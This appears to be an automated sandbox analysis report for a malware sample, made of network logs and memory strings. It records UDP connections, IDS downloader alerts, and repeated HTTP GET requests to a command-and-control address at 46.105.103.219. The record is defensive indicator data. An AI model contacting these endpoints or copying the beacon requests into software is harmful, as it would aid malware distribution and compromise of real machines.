        Source: global traffic | UDP traffic: 192.168.2.4:49334 -> 202.164.40.66:7866
        Source: global traffic | UDP traffic: 192.168.2.4:64646 -> 201.81.99.192:5415
        Source: global traffic | UDP traffic: 192.168.2.4:64647 -> 27.251.25.201:5089
        Source: global traffic | UDP traffic: 192.168.2.4:64648 -> 190.37.212.191:5415
        Source: global traffic | UDP traffic: 192.168.2.4:64649 -> 86.124.69.204:6953
        Source: global traffic | UDP traffic: 192.168.2.4:64650 -> 92.255.170.197:49928
        Source: global traffic | UDP traffic: 192.168.2.4:64651 -> 203.98.101.59:5460
        Source: global traffic | UDP traffic: 192.168.2.4:65023 -> 121.42.25.3:10510
        Source: global traffic | UDP traffic: 192.168.2.4:65024 -> 182.73.61.11:5350
        Source: global traffic | UDP traffic: 192.168.2.4:62741 -> 190.204.170.165:6219
        Source: global traffic | UDP traffic: 192.168.2.4:62742 -> 69.195.140.124:9675
        Source: global traffic | UDP traffic: 192.168.2.4:62743 -> 85.65.46.116:5225
        Source: global traffic | UDP traffic: 192.168.2.4:62744 -> 184.44.28.10:4392
        Source: global traffic | UDP traffic: 192.168.2.4:62745 -> 110.164.71.147:4539
        Source: global traffic | UDP traffic: 192.168.2.4:62746 -> 211.22.167.175:5820
        Source: global traffic | UDP traffic: 192.168.2.4:63571 -> 218.208.102.21:6228
        Source: global traffic | UDP traffic: 192.168.2.4:55286 -> 36.224.135.49:5380
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49749 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49742 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49735 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49748 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49786 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49745 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49746 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49752 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49819 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49747 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49797 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49774 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49846 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49750 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49868 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49891 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49880 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49857 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49808 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49914 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49902 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49759 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49973 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49951 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49834 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49984 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49925 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50045 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50054 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49940 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50047 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50043 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50053 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50052 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49962 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50042 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50050 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50046 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49995 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50049 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50019 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50051 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50044 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50006 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50032 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50048 -> 46.105.103.219:80
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?6e1ab4=64942164 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?102407c=118473572 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?1a7967a=83280750 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?247d6b5=76524906 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?2e864a2=146353638 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?387ee8e=177720234 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?4289802=69769218 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?4c8fe82=722530962 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?55ce57c=359896560 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?605f574=707376684 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?6ac3c3a=1007558154 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?746f30a=366270750 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?7e81b91=530607684 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?b40fdb1=566425875 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?10c254e3=1687027026 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?16620ca3=1502098060 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?2700512b=-1677638484 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?372892a3=1257467858 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?3d30b7a9=838047309 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?425e98d5=-1908960002 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?53792577=-1494070546 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?590aff39=-1307181454 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?60d9e770=579712592 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?7ccb59f9=1986137579 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?8195d24a=265959140 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?8756340a=-1778213858 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?8d11c4a2=-174069326 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?9241e677=612617454 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?a34963b3=-371447015 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?a74235ca=-343063876 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?aea19a18=1564685360 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?b104bfd4=-685687092 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?b4156853=1747636390 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?b8d36d83=-1675549809 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?bd601994=2059416360 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?c1fee9b0=267865472 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?c535894d=349578548 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?c977e755=-1829777750 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?cc9358d1=843932484 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?d0255c4e=-1325038046 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?d42c48fe=-1470590468 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?d7244def=-503438967 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?dae7c7e6=-1244688436 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?deb2d253=-1676118279 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?e40c8c88=-937879280 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?e7c0a656=226918236 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?eaf3a57c=-2118786840 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sobakavolos.gif?ee5adceb=1926686552 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 46.105.103.219 Cache-Control: no-cache
        Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.103.219
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_008F7A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread, | 0_2_008F7A3A
        Source: SearchApp.exe, 00000013.00000000.2039034540.0000024B551F6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: www.google.www.yahoo. equals www.yahoo.com (Yahoo)
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakak
        Source: RHxJqGoGFB.exe, RHxJqGoGFB.exe, 00000000.00000002.4215278724.0000000000760000.00000004.10000000.00040000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?102407c=118473572T
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?1a7967a=83280750I
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?247d6b5=76524906
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?2e864a2=146353638c
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234E
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?4289802=69769218R$u
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?4c8fe82=722530962C$
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?55ce57c=359896560p$W
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?605f574=707376684
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?6e1ab4=64942164
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?6e1ab4=64942164r
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?746f30a=366270750
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?7e81b91=530607684
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?9241e6
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?9241e677=612617454J
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?a34963b3=-371447015
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?a74235ca=-343063876
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360z
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b104bfd4=-685687092
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b104bfd4=-685687092dZ
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875=%
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b4156853=1747636390
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b4156853=1747636390d
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b8d36d83=-1675549809
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.105.103.219/sobakavolos.gif?b8d36d83=-1675549809Z
